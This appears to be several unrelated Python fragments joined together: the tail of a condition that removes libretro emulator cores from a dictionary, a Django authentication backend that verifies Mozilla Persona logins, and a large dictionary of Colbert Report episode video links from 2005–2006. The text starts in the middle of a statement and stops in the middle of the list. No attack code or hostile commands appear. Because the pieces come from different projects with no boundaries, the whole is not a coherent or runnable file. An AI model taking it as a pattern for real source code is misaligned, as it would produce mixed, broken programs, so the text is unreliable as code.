                #"4do_libretro" == key
                # or "81_libretro" == key
                # or "bluemsx_libretro" == key
                # or "bsnes_accuracy_libretro" == key
                # or "bsnes_balanced_libretro" == key
                # or "bsnes_performance_libretro" == key
                # or "cap32_libretro" == key
                # or "catsfc_libretro" == key
                # or "dosbox_libretro" == key
                # or "emux_chip8_libretro" == key
                # or "fb_alpha_cps1_libretro" == key
                # or "fb_alpha_cps2_libretro" == key
                # or "fmsx_libretro" == key
                # or "gpsp_libretro" == key
                # or "gw_libretro" == key
                # or "handy_libretro" == key
                # or "hatari_libretro" == key
                # or "imame4all_libretro" == key
                # or "mame078_libretro" == key
                # or "mame2010_libretro" == key
                # or "mame2014_libretro" == key
                # or "meteor_libretro" == key
                # or "o2em_libretro" == key
                # or "prosystem_libretro" == key
                # or "puae_libretro" == key
                # or "ume2014_libretro" == key
                # or "vecx_libretro" == key
                # or "virtualjaguar_libretro" == key

                # ARM cores
                 "pcsx" in key
                 or "pocketsnes_libretro" == key

                 ):
                del self.coreInfo["cores"][key]

# accounts/authentication.py


import requests
import logging

from django.conf import settings
from django.contrib.auth import get_user_model

logger = logging.getLogger(__name__)
User = get_user_model()
PERSONA_VERIFY_URL = 'https://verifier.login.persona.org/verify'
#DOMAIN = 'localhost'
#DOMAIN = 'http://hotzenplotz.pythonanywhere.com'


class PersonaAuthenticationBackend(object):

    def authenticate(self, assertion):
        logging.warning('entering authenticate function')
        response = requests.post(
            PERSONA_VERIFY_URL,
            data = {'assertion': assertion, 'audience': settings.DOMAIN}
        )
        logging.warning('got response from persona')
        logging.warning(response.content.decode())
        if response.ok and response.json()['status'] == 'okay':
            email = response.json()['email']
            try:
                return User.objects.get(email=email)
            except User.DoesNotExist:
                return User.objects.create(email=email)
        else:
            logger.warning(
                'Persona says no. Json was: {}'.format(response.json())
                )

    def get_user(self, email):
        try:
            return User.objects.get(email=email)
        except User.DoesNotExist:
            return None

import os
import sys
import subprocess

testP = {
  "2005": [
    {
      "date": "2005-10-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/61f6xj/intro---10-17-05",
        "http://thecolbertreport.cc.com/videos/w9dr6d/first-show",
        "http://thecolbertreport.cc.com/videos/63ite2/the-word---truthiness",
        "http://thecolbertreport.cc.com/videos/2hvbwp/threatdown---bird-flu",
        "http://thecolbertreport.cc.com/videos/ydz3a0/stone-phillips",
        "http://thecolbertreport.cc.com/videos/4ewylv/gravitas-off-with-stone-phillips",
        "http://thecolbertreport.cc.com/videos/e3mrnm/sign-off---commemorating-chewbacca-s-american-citizenship"
      ],
      "guest": "Stone Phillips"
    },
    {
      "date": "2005-10-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u39l6v/intro---10-18-05",
        "http://thecolbertreport.cc.com/videos/kzin67/the-word---bacchanalia",
        "http://thecolbertreport.cc.com/videos/5icgst/all-you-need-to-know---illegal-immigration",
        "http://thecolbertreport.cc.com/videos/fydq17/lesley-stahl",
        "http://thecolbertreport.cc.com/videos/235ftw/better-know-a-district---georgia-s-1st---jack-kingston",
        "http://thecolbertreport.cc.com/videos/joj31r/sign-off---a-fax-from-james-brady"
      ],
      "guest": "Lesley Stahl"
    },
    {
      "date": "2005-10-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vmoc19/intro---10-19-05",
        "http://thecolbertreport.cc.com/videos/gpmykq/the-word---disappointed",
        "http://thecolbertreport.cc.com/videos/95k30i/stephen-settles-the-debate---whales-and-cod-vs--polar-bears-and-seal-hunters",
        "http://thecolbertreport.cc.com/videos/p42ju6/on-notice---bobby-s-candy-apples",
        "http://thecolbertreport.cc.com/videos/malmcz/tip-wag---teen-pregnancy---katie-s-no-lady",
        "http://thecolbertreport.cc.com/videos/db0w9q/fareed-zakaria",
        "http://thecolbertreport.cc.com/videos/8kkcau/sign-off---the-in-box---you-re-great"
      ],
      "guest": "Fareed Zakaria"
    },
    {
      "date": "2005-10-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rwhdnt/intro---10-20-05",
        "http://thecolbertreport.cc.com/videos/p1n8k4/avian-flu",
        "http://thecolbertreport.cc.com/videos/mk7yrx/russ-lieber---candy-and-air",
        "http://thecolbertreport.cc.com/videos/cz3euw/un-american-news---the-foreign-press",
        "http://thecolbertreport.cc.com/videos/j1b7vj/jim-cramer",
        "http://thecolbertreport.cc.com/videos/rohluc/sign-off---credit-cards",
        "http://thecolbertreport.cc.com/videos/24lb41/the-word---love-handles"
      ],
      "guest": "Jim Cramer"
    },
    {
      "date": "2005-10-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/67cs19/intro---10-24-05",
        "http://thecolbertreport.cc.com/videos/gv2cjs/the-word---pussy",
        "http://thecolbertreport.cc.com/videos/i491tt/lou-dobbs",
        "http://thecolbertreport.cc.com/videos/dd1sbx/fract---the-wright-brothers",
        "http://thecolbertreport.cc.com/videos/wtqx4r/bring--em-back-or-leave--em-dead---inquisition",
        "http://thecolbertreport.cc.com/videos/qgvny1/mug-shot",
        "http://thecolbertreport.cc.com/videos/vuftif/against-the-pundocracy"
      ],
      "guest": "Lou Dobbs"
    },
    {
      "date": "2005-10-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lldiq0/intro---10-25-05",
        "http://thecolbertreport.cc.com/videos/whvmzj/benjamin-shalom-bernanke",
        "http://thecolbertreport.cc.com/videos/iqvyat/the-word---overrated",
        "http://thecolbertreport.cc.com/videos/qwe0c7/threatdown---anti-bacterial-soap",
        "http://thecolbertreport.cc.com/videos/7ioxmq/greg-behrendt",
        "http://thecolbertreport.cc.com/videos/nwkm8y/greg-behrendt-fields-calls",
        "http://thecolbertreport.cc.com/videos/vzk1ho/yet-another-day---soup-and-pets"
      ],
      "guest": "Greg Behrendt"
    },
    {
      "date": "2005-10-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nxsljd/intro---10-26-05",
        "http://thecolbertreport.cc.com/videos/39lnsj/outsourcing",
        "http://thecolbertreport.cc.com/videos/7o86ff/the-word---perspective",
        "http://thecolbertreport.cc.com/videos/yuq4bm/neil-degrasse-tyson",
        "http://thecolbertreport.cc.com/videos/5fyjl2/tip-wag---public-nudity-advice",
        "http://thecolbertreport.cc.com/videos/wsfpru/the-pulse"
      ],
      "guest": "Neil deGrasse Tyson"
    },
    {
      "date": "2005-10-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ap807f/intro---10-27-05",
        "http://thecolbertreport.cc.com/videos/nb6dxf/lieber---white-pumpkins",
        "http://thecolbertreport.cc.com/videos/llj5fu/the-word---quitter",
        "http://thecolbertreport.cc.com/videos/1vbs16/bookshelf-of-broken-dreams",
        "http://thecolbertreport.cc.com/videos/ynldrg/fract---the-states",
        "http://thecolbertreport.cc.com/videos/zyop79/better-know-a-district---massachusetts--4th---barney-frank",
        "http://thecolbertreport.cc.com/videos/h9zw2j/jeff-daniels",
        "http://thecolbertreport.cc.com/videos/3eb29d/yet-another-day---checking-in-with-christina-and-ernesto"
      ],
      "guest": "Jeff Daniels"
    },
    {
      "date": "2005-10-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/11fva6/intro---10-31-05",
        "http://thecolbertreport.cc.com/videos/mqoacz/criminal-intent",
        "http://thecolbertreport.cc.com/videos/p3782h/patrick-fitzgerald-s-press-conference",
        "http://thecolbertreport.cc.com/videos/ey4w8s/the-word---alito",
        "http://thecolbertreport.cc.com/videos/jfbl04/monica-crowley",
        "http://thecolbertreport.cc.com/videos/sxj08u/fract---greatest-lakes",
        "http://thecolbertreport.cc.com/videos/5d63df/stephen-settles-the-debate---ramadan-or-halloween-",
        "http://thecolbertreport.cc.com/videos/qc29ld/rocktober"
      ],
      "guest": "Monica Crowley"
    },
    {
      "date": "2005-11-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1zu9d3/intro---11-1-05",
        "http://thecolbertreport.cc.com/videos/r7fmyb/the-word---camilla-mania",
        "http://thecolbertreport.cc.com/videos/ufgobt/emergency-evacuation-plan",
        "http://thecolbertreport.cc.com/videos/b7u1wy/ken-burns",
        "http://thecolbertreport.cc.com/videos/kpjrtm/formidable-opponent---charity"
      ],
      "guest": "Ken Burns"
    },
    {
      "date": "2005-11-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1kskdq/intro---11-2-05",
        "http://thecolbertreport.cc.com/videos/xp1gbs/fatwa",
        "http://thecolbertreport.cc.com/videos/8e6qo8/c-span-coverage",
        "http://thecolbertreport.cc.com/videos/ayw8g9/the-word---cat",
        "http://thecolbertreport.cc.com/videos/ey3oos/fract---civil-war",
        "http://thecolbertreport.cc.com/videos/9438aw/the-war-on-wal-mart",
        "http://thecolbertreport.cc.com/videos/nvopei/bruce-feiler",
        "http://thecolbertreport.cc.com/videos/6v0azb/lieber---one-testicle"
      ],
      "guest": "Bruce Feiler"
    },
    {
      "date": "2005-11-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4g6fdp/intro---11-3-05",
        "http://thecolbertreport.cc.com/videos/9lmjfq/the-word---shhhh----",
        "http://thecolbertreport.cc.com/videos/tq3k8n/bradley-whitford",
        "http://thecolbertreport.cc.com/videos/wwof8g/fract---karl-marx",
        "http://thecolbertreport.cc.com/videos/cxtvxm/better-know-a-district---ohio-s-11th---stephanie-tubbs-jones",
        "http://thecolbertreport.cc.com/videos/86juj9/judge-tubbs",
        "http://thecolbertreport.cc.com/videos/mkig56/the-in-box---kicking-ass"
      ],
      "guest": "Bradley Whitford"
    },
    {
      "date": "2005-11-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lbtbtl/intro---11-7-05",
        "http://thecolbertreport.cc.com/videos/s0yn8n/rioting-do-s-and-don-ts",
        "http://thecolbertreport.cc.com/videos/2iezg1/the-word---hoser",
        "http://thecolbertreport.cc.com/videos/dzis1b/fract---frnap--the-freedom-snap",
        "http://thecolbertreport.cc.com/videos/1xhewi/threatdown---pirates",
        "http://thecolbertreport.cc.com/videos/fjfr4z/eliot-spitzer",
        "http://thecolbertreport.cc.com/videos/ufqqpc/rock--em-sock--em-robots"
      ],
      "guest": "Eliot Spitzer"
    },
    {
      "date": "2005-11-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2lgs12/intro---11-8-05",
        "http://thecolbertreport.cc.com/videos/5lxdom/america-doesn-t-torture",
        "http://thecolbertreport.cc.com/videos/xul3qa/intercepted-satellite-feed",
        "http://thecolbertreport.cc.com/videos/huzs1z/the-word---t-o-",
        "http://thecolbertreport.cc.com/videos/7nl1pw/fract---franagram--american-patriot",
        "http://thecolbertreport.cc.com/videos/wgvsjo/tip-wag---convicted-murderers",
        "http://thecolbertreport.cc.com/videos/0l19is/catherine-crier",
        "http://thecolbertreport.cc.com/videos/6zdr9d/wilford-brimley-calls---cocoon",
        "http://thecolbertreport.cc.com/videos/ykxirt/yet-another-day---flesh-eating-virus"
      ],
      "guest": "Catherine Crier"
    },
    {
      "date": "2005-11-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s6miz8/intro---11-9-05",
        "http://thecolbertreport.cc.com/videos/5fvmyv/next-question",
        "http://thecolbertreport.cc.com/videos/bcmkct/the-word---willy-loman",
        "http://thecolbertreport.cc.com/videos/43es16/all-you-need-to-know---kansas-education",
        "http://thecolbertreport.cc.com/videos/nzfogn/mary-roach",
        "http://thecolbertreport.cc.com/videos/gqeqrk/better-know-a-district---florida-s-7th---john-mica"
      ],
      "guest": "Mary Roach"
    },
    {
      "date": "2005-11-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jqfk3o/intro---11-10-05",
        "http://thecolbertreport.cc.com/videos/8c7dra/swear-to-god",
        "http://thecolbertreport.cc.com/videos/9kcrqk/the-word---armistice",
        "http://thecolbertreport.cc.com/videos/o63fqi/cokie-roberts",
        "http://thecolbertreport.cc.com/videos/bd1uuq/the-in-box---asian-stereotypes",
        "http://thecolbertreport.cc.com/videos/c0bksd/the-dacolbert-code---samuel-alito"
      ],
      "guest": "Cokie Roberts"
    },
    {
      "date": "2005-11-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e5zymg/intro---11-14-05",
        "http://thecolbertreport.cc.com/videos/gfzikt/cma-buzz",
        "http://thecolbertreport.cc.com/videos/jaukv1/the-word---testosterone",
        "http://thecolbertreport.cc.com/videos/oel1ef/bob-kerrey",
        "http://thecolbertreport.cc.com/videos/2lpp85/tip-line---flag-sticker",
        "http://thecolbertreport.cc.com/videos/1wb4cs/un-american-news---shame-cotton",
        "http://thecolbertreport.cc.com/videos/kuqe6u/internets-anniversary"
      ],
      "guest": "Sen. Bob Kerrey"
    },
    {
      "date": "2005-11-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c8h749/intro---11-15-05",
        "http://thecolbertreport.cc.com/videos/9jy462/sayako-s-wedding",
        "http://thecolbertreport.cc.com/videos/yctr24/the-word---the-orient",
        "http://thecolbertreport.cc.com/videos/4z4p4o/bring--em-back-or-leave--em-dead---asian-history",
        "http://thecolbertreport.cc.com/videos/94g5r1/al-sharpton",
        "http://thecolbertreport.cc.com/videos/9disf3/fract---mt--rushmore",
        "http://thecolbertreport.cc.com/videos/w11pi7/formidable-opponent---torture"
      ],
      "guest": "Rev. Al Sharpton"
    },
    {
      "date": "2005-11-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nl3o0c/intro---11-16-05",
        "http://thecolbertreport.cc.com/videos/ebxyv5/the-word---information",
        "http://thecolbertreport.cc.com/videos/eh69qj/on-notice-dead-to-me---juan-gabriel",
        "http://thecolbertreport.cc.com/videos/h1e498/better-know-a-district---colorado-s-2nd---mark-udall",
        "http://thecolbertreport.cc.com/videos/ddef4x/matt-taibbi",
        "http://thecolbertreport.cc.com/videos/4kvhir/america--sleep-safe"
      ],
      "guest": "Matt Taibbi"
    },
    {
      "date": "2005-11-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zl8rtq/intro---11-17-05",
        "http://thecolbertreport.cc.com/videos/f8fusi/no-good-deed",
        "http://thecolbertreport.cc.com/videos/pxeto4/the-word---mcconaughey-",
        "http://thecolbertreport.cc.com/videos/bypiaq/threatdown---children",
        "http://thecolbertreport.cc.com/videos/smm3x9/tim-robbins",
        "http://thecolbertreport.cc.com/videos/wk6dps/here-today--more-tomorrow",
        "http://thecolbertreport.cc.com/videos/8sxlv8/thanksgiving-vacation"
      ],
      "guest": "Tim Robbins"
    },
    {
      "date": "2005-11-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/sf87bf/intro---11-28-05",
        "http://thecolbertreport.cc.com/videos/nrf3km/cyber-monday",
        "http://thecolbertreport.cc.com/videos/sqsdz6/the-word---never",
        "http://thecolbertreport.cc.com/videos/r6xqra/viewer-phone-calls",
        "http://thecolbertreport.cc.com/videos/vdncvg/stephen-settles-the-debate---science-vs--faith",
        "http://thecolbertreport.cc.com/videos/507rw4/brian-greene",
        "http://thecolbertreport.cc.com/videos/ngo5nh/sign-off---check-your-local-listings"
      ],
      "guest": "Brian Greene"
    },
    {
      "date": "2005-11-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4yku0o/intro---11-29-05",
        "http://thecolbertreport.cc.com/videos/zaot6p/better-know-a-district---california-s-50th---randy--duke--cunningham",
        "http://thecolbertreport.cc.com/videos/o2kdz0/the-word---confidence",
        "http://thecolbertreport.cc.com/videos/6f1i25/was-it-really-that-bad----black-death",
        "http://thecolbertreport.cc.com/videos/75dr62/the--duke-s--things",
        "http://thecolbertreport.cc.com/videos/rtbpes/richard-preston"
      ],
      "guest": "Richard Preston"
    },
    {
      "date": "2005-11-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/951mir/intro---11-30-05",
        "http://thecolbertreport.cc.com/videos/jsl09o/the-word---gay-gay-gay-gay-gay",
        "http://thecolbertreport.cc.com/videos/h7okp1/fract---nobody-messes-with-house",
        "http://thecolbertreport.cc.com/videos/ut6y25/katrina-vanden-heuvel",
        "http://thecolbertreport.cc.com/videos/0frx2n/around-the-world-in-11-6-seconds---media"
      ],
      "guest": "Katrina Vanden Heuvel"
    },
    {
      "date": "2005-12-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j4tan3/intro---12-1-05",
        "http://thecolbertreport.cc.com/videos/bocj8y/giant-gold-washer",
        "http://thecolbertreport.cc.com/videos/w4dblj/the-word---spectacle",
        "http://thecolbertreport.cc.com/videos/3yvygm/tip-wag---seattle",
        "http://thecolbertreport.cc.com/videos/idpn3b/richard-clarke",
        "http://thecolbertreport.cc.com/videos/9icneu/face-transplant"
      ],
      "guest": "Richard Clarke"
    },
    {
      "date": "2005-12-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0yxnmj/intro---12-5-05",
        "http://thecolbertreport.cc.com/videos/utqsnp/kennedy-center-honors",
        "http://thecolbertreport.cc.com/videos/278dqm/the-word---xmas",
        "http://thecolbertreport.cc.com/videos/6ulwwh/apology",
        "http://thecolbertreport.cc.com/videos/sg4wi3/this-week-in-history---december-4th-10th",
        "http://thecolbertreport.cc.com/videos/p01a0h/colbert-nation-citizen-award",
        "http://thecolbertreport.cc.com/videos/djl273/maureen-dowd"
      ],
      "guest": "Maureen Dowd"
    },
    {
      "date": "2005-12-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ad0e3u/intro---12-6-05",
        "http://thecolbertreport.cc.com/videos/l23e5t/the-word---backsies",
        "http://thecolbertreport.cc.com/videos/c6b939/better-know-a-district---virginia-s-8th---jim-moran",
        "http://thecolbertreport.cc.com/videos/bgq83k/fract---the-star-spangled-banner",
        "http://thecolbertreport.cc.com/videos/mjqiqk/anderson-cooper",
        "http://thecolbertreport.cc.com/videos/jo01oi/season-of-giving"
      ],
      "guest": "Anderson Cooper"
    },
    {
      "date": "2005-12-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uvfu4h/intro---12-7-05",
        "http://thecolbertreport.cc.com/videos/k5nni4/burritos-happy-holidays",
        "http://thecolbertreport.cc.com/videos/rmm1zo/the-word---hell--no-",
        "http://thecolbertreport.cc.com/videos/5ti5hp/threatdown---threats",
        "http://thecolbertreport.cc.com/videos/1buius/craig-crawford"
      ],
      "guest": "Craig Crawford"
    },
    {
      "date": "2005-12-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/muvtpz/intro---12-8-07",
        "http://thecolbertreport.cc.com/videos/zo8qem/the-mallomar",
        "http://thecolbertreport.cc.com/videos/9zltfz/the-word---satisfied-",
        "http://thecolbertreport.cc.com/videos/zc6wzp/papa-bear-nailed-him",
        "http://thecolbertreport.cc.com/videos/0k58ru/movies-that-are-destroying-america---christmas",
        "http://thecolbertreport.cc.com/videos/f63xob/peggy-noonan",
        "http://thecolbertreport.cc.com/videos/huxiwh/nationwide-secret-santa"
      ],
      "guest": "Peggy Noonan"
    },
    {
      "date": "2005-12-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/26ln5h/intro---12-12-05",
        "http://thecolbertreport.cc.com/videos/th38l3/the-real-christmas",
        "http://thecolbertreport.cc.com/videos/xld8bn/the-word---belly-achin-",
        "http://thecolbertreport.cc.com/videos/4qrc6w/un-american-news---tootsie",
        "http://thecolbertreport.cc.com/videos/gljaa1/fract---war",
        "http://thecolbertreport.cc.com/videos/tos96b/harry-smith",
        "http://thecolbertreport.cc.com/videos/onf96q/the-in-box---custom-stamps"
      ],
      "guest": "Harry Smith"
    },
    {
      "date": "2005-12-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hh6w14/intro---12-13-05",
        "http://thecolbertreport.cc.com/videos/f3vpvn/the-de-ballification-of-the-american-sportscape",
        "http://thecolbertreport.cc.com/videos/omscph/the-word---lombardi",
        "http://thecolbertreport.cc.com/videos/53a836/sports-update",
        "http://thecolbertreport.cc.com/videos/reee2h/formidable-opponent---steroids",
        "http://thecolbertreport.cc.com/videos/raw18i/fract---nba",
        "http://thecolbertreport.cc.com/videos/mopfat/bob-costas",
        "http://thecolbertreport.cc.com/videos/97uhmb/sign-off---excellence-in-everything"
      ],
      "guest": "Bob Costas"
    },
    {
      "date": "2005-12-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/irtzij/intro---12-14-05",
        "http://thecolbertreport.cc.com/videos/rxzsfq/king-kong",
        "http://thecolbertreport.cc.com/videos/g7vs24/the-word---travolta",
        "http://thecolbertreport.cc.com/videos/j8pyop/tip-wag---redefining-cruel-and-unusual",
        "http://thecolbertreport.cc.com/videos/po8ta2/dermot-mulroney",
        "http://thecolbertreport.cc.com/videos/nf6l8d/sign-off---three-stockings"
      ],
      "guest": "Dermot Mulroney"
    },
    {
      "date": "2005-12-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/12ie90/intro---12-15-05",
        "http://thecolbertreport.cc.com/videos/7x2gjd/war-on-holiday",
        "http://thecolbertreport.cc.com/videos/1286w8/the-word---jetpack",
        "http://thecolbertreport.cc.com/videos/4epy8c/better-know-a-district---new-york-s-11th---major-owens",
        "http://thecolbertreport.cc.com/videos/gn64jt/mark-cuban",
        "http://thecolbertreport.cc.com/videos/9d08kf/tax-deductions"
      ],
      "guest": "Mark Cuban"
    }
  ],
  "2006": [
    {
      "date": "2006-01-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ccm8j9/intro---1-9-2006",
        "http://thecolbertreport.cc.com/videos/gfhklq/merry-christmas",
        "http://thecolbertreport.cc.com/videos/k2b0t4/going-at-it",
        "http://thecolbertreport.cc.com/videos/tfsnjk/the-lusk-alito-connection",
        "http://thecolbertreport.cc.com/videos/zvszwh/the-word---there-is-no-word",
        "http://thecolbertreport.cc.com/videos/wm808s/tip-wag---addicted-to-cute",
        "http://thecolbertreport.cc.com/videos/fx17nm/fract---columbus",
        "http://thecolbertreport.cc.com/videos/nctzb0/nancy-grace",
        "http://thecolbertreport.cc.com/videos/vt9veh/on-notice-dead-to-me---word-of-the-year"
      ],
      "guest": "Nancy Grace"
    },
    {
      "date": "2006-01-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zffhux/intro---1-10-02",
        "http://thecolbertreport.cc.com/videos/znlsxv/off-notice---the-e-street-band",
        "http://thecolbertreport.cc.com/videos/jz3vjq/the-word---sleeper-cell",
        "http://thecolbertreport.cc.com/videos/fzr3d5/balls-for-kidz---bear-hunting",
        "http://thecolbertreport.cc.com/videos/uk2dty/carl-bernstein",
        "http://thecolbertreport.cc.com/videos/lppcfe/the-in-box---taking-a-bullet"
      ],
      "guest": "Carl Bernstein"
    },
    {
      "date": "2006-01-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yq13d1/intro---1-11-06",
        "http://thecolbertreport.cc.com/videos/kci614/colbert-report-consumer-alert",
        "http://thecolbertreport.cc.com/videos/ho8xgd/alito-haters",
        "http://thecolbertreport.cc.com/videos/vko8sm/the-word---whatever",
        "http://thecolbertreport.cc.com/videos/bbh162/threatdown---fathers-and-sons",
        "http://thecolbertreport.cc.com/videos/o71qa3/fract---colbert-trivia",
        "http://thecolbertreport.cc.com/videos/4z25yz/john-stossel",
        "http://thecolbertreport.cc.com/videos/gsuxni/sign-off---future-money"
      ],
      "guest": "John Stossel"
    },
    {
      "date": "2006-01-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vkw0ea/intro---1-12-06",
        "http://thecolbertreport.cc.com/videos/smz33e/the-oscars",
        "http://thecolbertreport.cc.com/videos/hldbza/the-word---double-stick-tape",
        "http://thecolbertreport.cc.com/videos/ycx56p/better-know-a-district---new-jersey-s-9th---steven-rothman",
        "http://thecolbertreport.cc.com/videos/4huh6w/fract---frnap--monarchy",
        "http://thecolbertreport.cc.com/videos/2qbk3w/kenneth-miller",
        "http://thecolbertreport.cc.com/videos/393ez5/michael-adams--apology"
      ],
      "guest": "Ken Miller"
    },
    {
      "date": "2006-01-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hk33gu/intro---1-16-06",
        "http://thecolbertreport.cc.com/videos/sfiw6u/martin-luther-king-jr--day",
        "http://thecolbertreport.cc.com/videos/a3wcdf/the-word---cerrado-",
        "http://thecolbertreport.cc.com/videos/7te5id/movies-that-are-destroying-america---transamerica",
        "http://thecolbertreport.cc.com/videos/2zgm7q/fract---captain-north-korea",
        "http://thecolbertreport.cc.com/videos/39qjdh/george-stephanopoulos",
        "http://thecolbertreport.cc.com/videos/1jvqfi/sign-off---i-have-a-dreamsicle"
      ],
      "guest": "George Stephanopoulos"
    },
    {
      "date": "2006-01-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/btjtm2/intro---1-17-2006",
        "http://thecolbertreport.cc.com/videos/uhh2bv/the-golden-globes",
        "http://thecolbertreport.cc.com/videos/lqd06o/age-defying-pancakes",
        "http://thecolbertreport.cc.com/videos/pxy8xm/the-word---old-school",
        "http://thecolbertreport.cc.com/videos/3wpryl/tip-wag---eminem",
        "http://thecolbertreport.cc.com/videos/l2yoxp/andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/lpdbmt/wilford-brimley-calls---oatmeal"
      ],
      "guest": "Andrew Sullivan"
    },
    {
      "date": "2006-01-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nh5ji3/intro---1-18-06",
        "http://thecolbertreport.cc.com/videos/z3vrpl/the-de-edumacation-of-the-american-brainscape",
        "http://thecolbertreport.cc.com/videos/ti5lsj/the-word---smarterer",
        "http://thecolbertreport.cc.com/videos/92rf9j/bring--em-back-or-leave--em-dead---teacher-s-edition",
        "http://thecolbertreport.cc.com/videos/rnpcxp/frank-mccourt",
        "http://thecolbertreport.cc.com/videos/86d7fs/sign-off---the-bully-system"
      ],
      "guest": "Frank McCourt"
    },
    {
      "date": "2006-01-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1ibsf9/intro---1-19-06",
        "http://thecolbertreport.cc.com/videos/9s67zo/who-s-attacking-me-now----humane-society",
        "http://thecolbertreport.cc.com/videos/xguuix/the-word---public-see",
        "http://thecolbertreport.cc.com/videos/lidn3n/better-know-a-district---new-york-s-17th---eliot-engel",
        "http://thecolbertreport.cc.com/videos/11mx9e/nina-totenberg",
        "http://thecolbertreport.cc.com/videos/9g8c9i/sign-off---drink-on"
      ],
      "guest": "Nina Totenberg"
    },
    {
      "date": "2006-01-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rnxq1m/intro---1-23-06",
        "http://thecolbertreport.cc.com/videos/k046s8/oprah-s-book-club",
        "http://thecolbertreport.cc.com/videos/ruzjfq/the-word---charlie-daniels",
        "http://thecolbertreport.cc.com/videos/0wj0h7/threatdown---hamas",
        "http://thecolbertreport.cc.com/videos/puj7cw/david-gregory",
        "http://thecolbertreport.cc.com/videos/ipkxy5/dr--love"
      ],
      "guest": "David Gregory"
    },
    {
      "date": "2006-01-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4cxurq/intro---1-24-06",
        "http://thecolbertreport.cc.com/videos/63ywy8/most-depressing-day-of-the-year",
        "http://thecolbertreport.cc.com/videos/xpxm3x/the-word---chernobyl",
        "http://thecolbertreport.cc.com/videos/bpx4o0/formidable-opponent---superpowers",
        "http://thecolbertreport.cc.com/videos/44x8vn/robin-givhan",
        "http://thecolbertreport.cc.com/videos/meshre/the-in-box---dvds"
      ],
      "guest": "Robin Givhan"
    },
    {
      "date": "2006-01-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fcwdw2/intro---1-25-06",
        "http://thecolbertreport.cc.com/videos/sc546i/bill-o-reilly--fan-of-the-show",
        "http://thecolbertreport.cc.com/videos/dg5r31/the-word---remote-control",
        "http://thecolbertreport.cc.com/videos/d7q9f6/better-know-a-district---new-jersey-s-8th---bill-pascrell",
        "http://thecolbertreport.cc.com/videos/e7x760/norah-vincent"
      ],
      "guest": "Norah Vincent"
    },
    {
      "date": "2006-01-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lquo7k/intro---1-26-06",
        "http://thecolbertreport.cc.com/videos/xh484k/thundersnow",
        "http://thecolbertreport.cc.com/videos/qdqpdn/who-s-attacking-me-now----marina-core",
        "http://thecolbertreport.cc.com/videos/9v3sqy/the-word---wham-o",
        "http://thecolbertreport.cc.com/videos/qnlt2s/one-of-the-heroes--lily-s-",
        "http://thecolbertreport.cc.com/videos/lca5rm/colbert-cruise---write-off",
        "http://thecolbertreport.cc.com/videos/gimvpm/paul-begala"
      ],
      "guest": "Paul Begala"
    },
    {
      "date": "2006-01-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fhkpsg/intro---1-30-06",
        "http://thecolbertreport.cc.com/videos/vbdym4/james-frey-s-truthiness",
        "http://thecolbertreport.cc.com/videos/e6nijq/the-word---abortion",
        "http://thecolbertreport.cc.com/videos/5se9xj/tip-wag---google",
        "http://thecolbertreport.cc.com/videos/3f4m4d/annie-duke"
      ],
      "guest": "Annie Duke"
    },
    {
      "date": "2006-01-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2cxabn/intro---1-31-06",
        "http://thecolbertreport.cc.com/videos/d5gebw/the-word---jesi",
        "http://thecolbertreport.cc.com/videos/fo1pme/all-you-need-to-know---samuel-alito",
        "http://thecolbertreport.cc.com/videos/165jzf/fract---the-american-flag",
        "http://thecolbertreport.cc.com/videos/2uduhl/david-maresh",
        "http://thecolbertreport.cc.com/videos/iddejj/sign-off---god-bless",
        "http://thecolbertreport.cc.com/videos/2na088/craziest-f--king-thing-i-ve-ever-heard---snake-and-hamster"
      ],
      "guest": "Dave Marash"
    },
    {
      "date": "2006-02-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dk9yev/intro---2-1-06",
        "http://thecolbertreport.cc.com/videos/y6qr8t/the-american-worker--a-hero-s-salute-to-the-besieged-heroes-of-the-american-jobscape",
        "http://thecolbertreport.cc.com/videos/u7tnek/the-word---you-re-welcome",
